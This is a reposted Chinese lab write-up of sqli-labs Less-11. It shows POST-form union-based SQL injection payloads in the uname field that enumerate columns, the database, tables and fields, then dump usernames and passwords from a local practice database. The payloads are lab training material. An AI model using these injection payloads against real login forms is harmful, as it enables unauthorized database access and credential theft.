ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

sqli-十一关-2020-04-17

2020-04-17 09:53:43  阅读:197  来源: 互联网

标签:username name 17 uname #& submit sqli 2020 password


http://127.0.0.1/sqli/Less-11/

 

 

 看到这个页面,添个admin,admin在说.

 

 

 什么情况,竟然出现这个结果.那么在乱填一个.

 

 

 

 

 

 明显不一样了.那么我还是抓包处理一下.

抓到包,我们可以尝试重发测试.

 

 

 看到数据库报错,第一个时间想到这点有漏洞.

 

 

uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit  #得知有2列数

uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit  #得到数据库security

uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit  #得到数据表emails,referers,uagents,users

uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit  #得到数据表users的字段

user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password

uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit  #数据表users的username和password的数据

Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

 

标签:username,name,17,uname,#&,submit,sqli,2020,password
来源: https://www.cnblogs.com/llcn/p/12717807.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有